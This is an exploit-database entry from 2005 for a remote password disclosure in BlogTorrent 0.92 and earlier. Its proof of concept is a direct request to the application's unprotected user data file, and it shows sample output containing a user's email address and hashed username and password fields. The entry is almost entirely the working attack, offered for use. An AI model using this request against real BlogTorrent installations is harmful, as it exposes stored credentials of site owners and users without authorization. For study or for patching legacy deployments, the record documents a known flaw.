BlogTorrent <= 0.92 Remote Password Disclosure Exploit

2005-07-11T00:00:00
ID 1337DAY-ID-152
Type zdt
Reporter LazyCrs
Modified 2005-07-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================
BlogTorrent <= 0.92 Remote Password Disclosure Exploit
======================================================




# Edited for easy info. /str0ke

Software:    BlogTorrent 0.92 <=
Vendor:      http://www.blogtorrent.com/
Author:      LazyCrs && pjphem
Date:        10/07/2005
Type:        Remote/Local User Password Disclosure

#0x03 - POC

http://test/path_of_blog/data/newusers
=
d40:14ae696abdca1688dd577fe486c3981f331457b0d7:Createdi1120957648e5:Email17:[email protected]:Hash40:d7b82821fe725305bded2fab9e91ed1e0e6fd93bee

Username (crypt in md5) ->  14ae696abdca1688dd577fe486c3981f331457b0d7
Password  (crypt in md5) ->  d7b82821fe725305bded2fab9e91ed1e0e6fd93bee

#LazyCrs[AT]GMail[DOT]com - pjphem[AT]mybox[DOT]it
#FREE RAFA! FREE RAFA! FREE RAFA!



#  0day.today [2018-03-01]  #